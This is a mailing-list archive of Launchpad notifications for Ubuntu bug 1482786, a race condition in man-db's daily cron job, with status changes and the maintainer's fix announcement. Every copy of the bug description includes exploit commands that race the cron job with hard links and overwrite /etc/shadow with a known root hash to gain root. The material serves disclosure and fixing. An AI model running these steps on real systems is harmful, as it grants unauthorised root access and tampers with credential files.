subject:"\[Touch\-packages\] \[Bug 1482786\] Re\: man\-db daily cron job TOCTOU bug when processing catman pages"

[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2022-11-09 Thread Benjamin Drung

The apport lock file permission was addressed in bug #1862348.

** Changed in: apport (Ubuntu)
   Status: Confirmed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1482786

Title:
  man-db daily cron job TOCTOU bug when processing catman pages

Status in apport package in Ubuntu:
  Fix Released
Status in man-db package in Ubuntu:
  Fix Released
Status in pam package in Ubuntu:
  Confirmed
Status in shadow package in Ubuntu:
  Confirmed

Bug description:
  The daily mandb cleanup job for old catman pages changes the
  permissions of all non-man files to user man. The problematic code is:

  # expunge old catman pages which have not been read in a week
  if [ -d /var/cache/man ]; then
cd /
if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then
  find /var/cache/man -ignore_readdir_race ! -user man -print0 | \
xargs -r0 chown -f man || true
fi
...

  By creating a hard link and winning the race, user man may escalate
  privileges to user root. See [1] for full explanation.

  man# mkdir -p /var/cache/man/etc
  man# ln /var/crash/.lock /var/cache/man/etc/shadow
  man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath 
/var/cache/man/etc --LinkTarget /etc
  ... Wait till daily cronjob was run
  man# cp /etc/shadow .
  man# sed -r -e 
's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' 
/etc/shadow > x
  man# cat x > /etc/shadow; rm x
  man# su -s /bin/sh (password is 123)
  root# cat shadow > /etc/shadow; chown root /etc/shadow

  
  # lsb_release -rd
  Description:Ubuntu 14.04.3 LTS
  Release:14.04

  # apt-cache policy man-db
  man-db:
Installed: 2.6.7.1-1ubuntu1
Candidate: 2.6.7.1-1ubuntu1
Version table:
   *** 2.6.7.1-1ubuntu1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 
Packages
  100 /var/lib/dpkg/status
   2.6.7.1-1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages

  [1]
  http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2020-05-20 Thread Colin Watson

@serge-hallyn: The fix for the reported bug was entirely in man-db (see
comment #15), although it was a combination of upstream and packaging
work.  The apport, pam, and shadow tasks were spun off by @sarnold; the
pam/shadow tasks are explained in comment #2.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1482786

Title:
  man-db daily cron job TOCTOU bug when processing catman pages

Status in apport package in Ubuntu:
  Confirmed
Status in man-db package in Ubuntu:
  Fix Released
Status in pam package in Ubuntu:
  Confirmed
Status in shadow package in Ubuntu:
  Confirmed

Bug description:
  The daily mandb cleanup job for old catman pages changes the
  permissions of all non-man files to user man. The problematic code is:

  # expunge old catman pages which have not been read in a week
  if [ -d /var/cache/man ]; then
cd /
if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then
  find /var/cache/man -ignore_readdir_race ! -user man -print0 | \
xargs -r0 chown -f man || true
fi
...

  By creating a hard link and winning the race, user man may escalate
  privileges to user root. See [1] for full explanation.

  man# mkdir -p /var/cache/man/etc
  man# ln /var/crash/.lock /var/cache/man/etc/shadow
  man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath 
/var/cache/man/etc --LinkTarget /etc
  ... Wait till daily cronjob was run
  man# cp /etc/shadow .
  man# sed -r -e 
's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' 
/etc/shadow > x
  man# cat x > /etc/shadow; rm x
  man# su -s /bin/sh (password is 123)
  root# cat shadow > /etc/shadow; chown root /etc/shadow

  
  # lsb_release -rd
  Description:Ubuntu 14.04.3 LTS
  Release:14.04

  # apt-cache policy man-db
  man-db:
Installed: 2.6.7.1-1ubuntu1
Candidate: 2.6.7.1-1ubuntu1
Version table:
   *** 2.6.7.1-1ubuntu1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 
Packages
  100 /var/lib/dpkg/status
   2.6.7.1-1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages

  [1]
  http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2020-05-19 Thread Serge Hallyn

@cjwatson - is it safe to assume the fix was entirely in man-db?  Or was
shadow supposed to do something here as well?

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1482786

Title:
  man-db daily cron job TOCTOU bug when processing catman pages

Status in apport package in Ubuntu:
  Confirmed
Status in man-db package in Ubuntu:
  Fix Released
Status in pam package in Ubuntu:
  Confirmed
Status in shadow package in Ubuntu:
  Confirmed

Bug description:
  The daily mandb cleanup job for old catman pages changes the
  permissions of all non-man files to user man. The problematic code is:

  # expunge old catman pages which have not been read in a week
  if [ -d /var/cache/man ]; then
cd /
if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then
  find /var/cache/man -ignore_readdir_race ! -user man -print0 | \
xargs -r0 chown -f man || true
fi
...

  By creating a hard link and winning the race, user man may escalate
  privileges to user root. See [1] for full explanation.

  man# mkdir -p /var/cache/man/etc
  man# ln /var/crash/.lock /var/cache/man/etc/shadow
  man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath 
/var/cache/man/etc --LinkTarget /etc
  ... Wait till daily cronjob was run
  man# cp /etc/shadow .
  man# sed -r -e 
's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' 
/etc/shadow > x
  man# cat x > /etc/shadow; rm x
  man# su -s /bin/sh (password is 123)
  root# cat shadow > /etc/shadow; chown root /etc/shadow

  
  # lsb_release -rd
  Description:Ubuntu 14.04.3 LTS
  Release:14.04

  # apt-cache policy man-db
  man-db:
Installed: 2.6.7.1-1ubuntu1
Candidate: 2.6.7.1-1ubuntu1
Version table:
   *** 2.6.7.1-1ubuntu1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 
Packages
  100 /var/lib/dpkg/status
   2.6.7.1-1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages

  [1]
  http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2018-08-27 Thread Chris Adams

Was the decision made not to backport this to 14.04 and 16.04 LTS?

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1482786

Title:
  man-db daily cron job TOCTOU bug when processing catman pages

Status in apport package in Ubuntu:
  Confirmed
Status in man-db package in Ubuntu:
  Fix Released
Status in pam package in Ubuntu:
  Confirmed
Status in shadow package in Ubuntu:
  Confirmed

Bug description:
  The daily mandb cleanup job for old catman pages changes the
  permissions of all non-man files to user man. The problematic code is:

  # expunge old catman pages which have not been read in a week
  if [ -d /var/cache/man ]; then
cd /
if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then
  find /var/cache/man -ignore_readdir_race ! -user man -print0 | \
xargs -r0 chown -f man || true
fi
...

  By creating a hard link and winning the race, user man may escalate
  privileges to user root. See [1] for full explanation.

  man# mkdir -p /var/cache/man/etc
  man# ln /var/crash/.lock /var/cache/man/etc/shadow
  man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath 
/var/cache/man/etc --LinkTarget /etc
  ... Wait till daily cronjob was run
  man# cp /etc/shadow .
  man# sed -r -e 
's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' 
/etc/shadow > x
  man# cat x > /etc/shadow; rm x
  man# su -s /bin/sh (password is 123)
  root# cat shadow > /etc/shadow; chown root /etc/shadow

  
  # lsb_release -rd
  Description:Ubuntu 14.04.3 LTS
  Release:14.04

  # apt-cache policy man-db
  man-db:
Installed: 2.6.7.1-1ubuntu1
Candidate: 2.6.7.1-1ubuntu1
Version table:
   *** 2.6.7.1-1ubuntu1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 
Packages
  100 /var/lib/dpkg/status
   2.6.7.1-1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages

  [1]
  http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2016-12-13 Thread Launchpad Bug Tracker

This bug was fixed in the package man-db - 2.7.6.1-1

---
man-db (2.7.6.1-1) unstable; urgency=medium

  * New upstream release:
- Don't chmod CACHEDIR.TAG if it doesn't exist (closes: #847810).

 -- Colin Watson   Mon, 12 Dec 2016 12:51:57 +

** Changed in: man-db (Ubuntu)
   Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1482786

Title:
  man-db daily cron job TOCTOU bug when processing catman pages

Status in apport package in Ubuntu:
  Confirmed
Status in man-db package in Ubuntu:
  Fix Released
Status in pam package in Ubuntu:
  Confirmed
Status in shadow package in Ubuntu:
  Confirmed

Bug description:
  The daily mandb cleanup job for old catman pages changes the
  permissions of all non-man files to user man. The problematic code is:

  # expunge old catman pages which have not been read in a week
  if [ -d /var/cache/man ]; then
cd /
if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then
  find /var/cache/man -ignore_readdir_race ! -user man -print0 | \
xargs -r0 chown -f man || true
fi
...

  By creating a hard link and winning the race, user man may escalate
  privileges to user root. See [1] for full explanation.

  man# mkdir -p /var/cache/man/etc
  man# ln /var/crash/.lock /var/cache/man/etc/shadow
  man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath 
/var/cache/man/etc --LinkTarget /etc
  ... Wait till daily cronjob was run
  man# cp /etc/shadow .
  man# sed -r -e 
's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' 
/etc/shadow > x
  man# cat x > /etc/shadow; rm x
  man# su -s /bin/sh (password is 123)
  root# cat shadow > /etc/shadow; chown root /etc/shadow

  
  # lsb_release -rd
  Description:Ubuntu 14.04.3 LTS
  Release:14.04

  # apt-cache policy man-db
  man-db:
Installed: 2.6.7.1-1ubuntu1
Candidate: 2.6.7.1-1ubuntu1
Version table:
   *** 2.6.7.1-1ubuntu1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 
Packages
  100 /var/lib/dpkg/status
   2.6.7.1-1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages

  [1]
  http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2016-12-11 Thread Colin Watson

Apologies for my long delay in dealing with these bugs, both reported by
halfdog.  Fixes turned out to be quite complicated, since in part they
involved unwinding incorrect logic from nearly 20 years ago and ensuring
that everything else built on that was appropriately adjusted.

Here are the relevant sections from my release announcement, which
should appear at https://lists.nongnu.org/archive/html/man-db-
announce/2016-12/msg0.html in the near future:

  * SECURITY: Eliminate dangerous setgid-root directories.  In the default
configuration, cache files and directories are now owned by man:man
rather than man:root; man and mandb are now setgid man as well as
setuid man (except in the --disable-setuid case).  This is a much
simpler and safer solution to the original problem that caused my
predecessor to make directories setgid root, and doesn't introduce any
interesting new privilege since the man group's only real purpose is
to be the man user's primary group and nothing in cache directories is
group-writeable.

Maintainers of distribution packagers should take care to review their
installation rules in light of this change.

As far as I know this has no CVE ID, but it is described here:

http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/

  [...]

  Notes for distributors
  ==

  The security fix above was quite involved.  If you're trying to backport
  it to a stable release, then you should probably consider at least these
  commits:

e62b9edafe00c51e52863718cb2eb1e29385230e Rename some anomalous x* functions
9ab9f3dd9b0d5f290c635995559332c1710e5b4d man(1): Fix gcc warnings
0f8b5518949866075c25787bdc4e9c064597c21e Separate cache owner from 
--enable-setuid option
94b9d1e2a14ce8790d7c73df00d0bbd9e40cd437 Handle cleanup stack more safely
c7f7daa9b2ffbbf4c45a2b168802a51acc2263c0 Make --disable-cache-owner imply 
--disable-setuid
31552334cecee82809059ec598a37d9ea82683f0 Eliminate dangerous setgid-root 
directories
755a9551c45da82f99d0ad8e46ef756afbeafb3f Fix distcheck following 
cache-owner/setuid changes
75701f7fd9a00108abeb851792231b3d9bc2a67d Fix systemd tmpfiles group/perms 
of /var/cache/man

  Feel free to contact me if you have difficulty.  You should also
  consider
  
http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/,
  which could not be fixed without fixing the above bug first; while this
  bug was in Debian-specific cron jobs, others may have copied them.

I've uploaded 2.7.6-1 to unstable with fixes for these vulnerabilities.
I'd be happy to help out the Debian and Ubuntu security teams with
backports if they need it, although hopefully the above list of git
commits is enough to get started.

** Changed in: man-db (Ubuntu)
 Assignee: (unassigned) => Colin Watson (cjwatson)

** Changed in: man-db (Ubuntu)
   Importance: Medium => High

** Changed in: man-db (Ubuntu)
   Status: Confirmed => Fix Committed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1482786

Title:
  man-db daily cron job TOCTOU bug when processing catman pages

Status in apport package in Ubuntu:
  Confirmed
Status in man-db package in Ubuntu:
  Fix Committed
Status in pam package in Ubuntu:
  Confirmed
Status in shadow package in Ubuntu:
  Confirmed

Bug description:
  The daily mandb cleanup job for old catman pages changes the
  permissions of all non-man files to user man. The problematic code is:

  # expunge old catman pages which have not been read in a week
  if [ -d /var/cache/man ]; then
cd /
if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then
  find /var/cache/man -ignore_readdir_race ! -user man -print0 | \
xargs -r0 chown -f man || true
fi
...

  By creating a hard link and winning the race, user man may escalate
  privileges to user root. See [1] for full explanation.

  man# mkdir -p /var/cache/man/etc
  man# ln /var/crash/.lock /var/cache/man/etc/shadow
  man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath 
/var/cache/man/etc --LinkTarget /etc
  ... Wait till daily cronjob was run
  man# cp /etc/shadow .
  man# sed -r -e 
's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' 
/etc/shadow > x
  man# cat x > /etc/shadow; rm x
  man# su -s /bin/sh (password is 123)
  root# cat shadow > /etc/shadow; chown root /etc/shadow

  
  # lsb_release -rd
  Description:Ubuntu 14.04.3 LTS
  Release:14.04

  # apt-cache policy man-db
  man-db:
Installed: 2.6.7.1-1ubuntu1
Candidate: 2.6.7.1-1ubuntu1
Version table:
   *** 2.6.7.1-1ubuntu1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 
Packages
  100 /var/lib/dpkg/status
   2.6.7.1-1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64

[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2016-06-04 Thread Marc Deslauriers

** Changed in: apport (Ubuntu)
   Status: Fix Committed => Confirmed

** Changed in: man-db (Ubuntu)
   Status: Fix Committed => Confirmed

** Changed in: pam (Ubuntu)
   Status: Fix Committed => Confirmed

** Changed in: shadow (Ubuntu)
   Status: Fix Committed => Confirmed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/1482786

Title:
  man-db daily cron job TOCTOU bug when processing catman pages

Status in apport package in Ubuntu:
  Confirmed
Status in man-db package in Ubuntu:
  Confirmed
Status in pam package in Ubuntu:
  Confirmed
Status in shadow package in Ubuntu:
  Confirmed

Bug description:
  The daily mandb cleanup job for old catman pages changes the
  permissions of all non-man files to user man. The problematic code is:

  # expunge old catman pages which have not been read in a week
  if [ -d /var/cache/man ]; then
cd /
if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then
  find /var/cache/man -ignore_readdir_race ! -user man -print0 | \
xargs -r0 chown -f man || true
fi
...

  By creating a hard link and winning the race, user man may escalate
  privileges to user root. See [1] for full explanation.

  man# mkdir -p /var/cache/man/etc
  man# ln /var/crash/.lock /var/cache/man/etc/shadow
  man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath 
/var/cache/man/etc --LinkTarget /etc
  ... Wait till daily cronjob was run
  man# cp /etc/shadow .
  man# sed -r -e 
's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' 
/etc/shadow > x
  man# cat x > /etc/shadow; rm x
  man# su -s /bin/sh (password is 123)
  root# cat shadow > /etc/shadow; chown root /etc/shadow

  
  # lsb_release -rd
  Description:Ubuntu 14.04.3 LTS
  Release:14.04

  # apt-cache policy man-db
  man-db:
Installed: 2.6.7.1-1ubuntu1
Candidate: 2.6.7.1-1ubuntu1
Version table:
   *** 2.6.7.1-1ubuntu1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 
Packages
  100 /var/lib/dpkg/status
   2.6.7.1-1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages

  [1]
  http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2016-06-04 Thread jose

** Changed in: apport (Ubuntu)
   Status: Confirmed => Fix Committed

** Changed in: man-db (Ubuntu)
   Status: Confirmed => Fix Committed

** Changed in: pam (Ubuntu)
   Status: Confirmed => Fix Committed

** Changed in: shadow (Ubuntu)
   Status: Confirmed => Fix Committed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/1482786

Title:
  man-db daily cron job TOCTOU bug when processing catman pages

Status in apport package in Ubuntu:
  Fix Committed
Status in man-db package in Ubuntu:
  Fix Committed
Status in pam package in Ubuntu:
  Fix Committed
Status in shadow package in Ubuntu:
  Fix Committed

Bug description:
  The daily mandb cleanup job for old catman pages changes the
  permissions of all non-man files to user man. The problematic code is:

  # expunge old catman pages which have not been read in a week
  if [ -d /var/cache/man ]; then
cd /
if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then
  find /var/cache/man -ignore_readdir_race ! -user man -print0 | \
xargs -r0 chown -f man || true
fi
...

  By creating a hard link and winning the race, user man may escalate
  privileges to user root. See [1] for full explanation.

  man# mkdir -p /var/cache/man/etc
  man# ln /var/crash/.lock /var/cache/man/etc/shadow
  man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath 
/var/cache/man/etc --LinkTarget /etc
  ... Wait till daily cronjob was run
  man# cp /etc/shadow .
  man# sed -r -e 
's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' 
/etc/shadow > x
  man# cat x > /etc/shadow; rm x
  man# su -s /bin/sh (password is 123)
  root# cat shadow > /etc/shadow; chown root /etc/shadow

  
  # lsb_release -rd
  Description:Ubuntu 14.04.3 LTS
  Release:14.04

  # apt-cache policy man-db
  man-db:
Installed: 2.6.7.1-1ubuntu1
Candidate: 2.6.7.1-1ubuntu1
Version table:
   *** 2.6.7.1-1ubuntu1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 
Packages
  100 /var/lib/dpkg/status
   2.6.7.1-1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages

  [1]
  http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2016-02-01 Thread Mathew Hodson

** Changed in: man-db (Ubuntu)
   Importance: Undecided => Medium

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/1482786

Title:
  man-db daily cron job TOCTOU bug when processing catman pages

Status in apport package in Ubuntu:
  Confirmed
Status in man-db package in Ubuntu:
  Confirmed
Status in pam package in Ubuntu:
  Confirmed
Status in shadow package in Ubuntu:
  Confirmed

Bug description:
  The daily mandb cleanup job for old catman pages changes the
  permissions of all non-man files to user man. The problematic code is:

  # expunge old catman pages which have not been read in a week
  if [ -d /var/cache/man ]; then
cd /
if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then
  find /var/cache/man -ignore_readdir_race ! -user man -print0 | \
xargs -r0 chown -f man || true
fi
...

  By creating a hard link and winning the race, user man may escalate
  privileges to user root. See [1] for full explanation.

  man# mkdir -p /var/cache/man/etc
  man# ln /var/crash/.lock /var/cache/man/etc/shadow
  man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath 
/var/cache/man/etc --LinkTarget /etc
  ... Wait till daily cronjob was run
  man# cp /etc/shadow .
  man# sed -r -e 
's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' 
/etc/shadow > x
  man# cat x > /etc/shadow; rm x
  man# su -s /bin/sh (password is 123)
  root# cat shadow > /etc/shadow; chown root /etc/shadow

  
  # lsb_release -rd
  Description:Ubuntu 14.04.3 LTS
  Release:14.04

  # apt-cache policy man-db
  man-db:
Installed: 2.6.7.1-1ubuntu1
Candidate: 2.6.7.1-1ubuntu1
Version table:
   *** 2.6.7.1-1ubuntu1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 
Packages
  100 /var/lib/dpkg/status
   2.6.7.1-1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages

  [1]
  http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2015-12-14 Thread Marc Deslauriers

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/1482786

Title:
  man-db daily cron job TOCTOU bug when processing catman pages

Status in apport package in Ubuntu:
  Confirmed
Status in man-db package in Ubuntu:
  Confirmed
Status in pam package in Ubuntu:
  Confirmed
Status in shadow package in Ubuntu:
  Confirmed

Bug description:
  The daily mandb cleanup job for old catman pages changes the
  permissions of all non-man files to user man. The problematic code is:

  # expunge old catman pages which have not been read in a week
  if [ -d /var/cache/man ]; then
cd /
if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then
  find /var/cache/man -ignore_readdir_race ! -user man -print0 | \
xargs -r0 chown -f man || true
fi
...

  By creating a hard link and winning the race, user man may escalate
  privileges to user root. See [1] for full explanation.

  man# mkdir -p /var/cache/man/etc
  man# ln /var/crash/.lock /var/cache/man/etc/shadow
  man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath 
/var/cache/man/etc --LinkTarget /etc
  ... Wait till daily cronjob was run
  man# cp /etc/shadow .
  man# sed -r -e 
's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' 
/etc/shadow > x
  man# cat x > /etc/shadow; rm x
  man# su -s /bin/sh (password is 123)
  root# cat shadow > /etc/shadow; chown root /etc/shadow

  
  # lsb_release -rd
  Description:Ubuntu 14.04.3 LTS
  Release:14.04

  # apt-cache policy man-db
  man-db:
Installed: 2.6.7.1-1ubuntu1
Candidate: 2.6.7.1-1ubuntu1
Version table:
   *** 2.6.7.1-1ubuntu1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 
Packages
  100 /var/lib/dpkg/status
   2.6.7.1-1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages

  [1]
  http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

10 matches

Site Navigation

Mail list logo

Footer information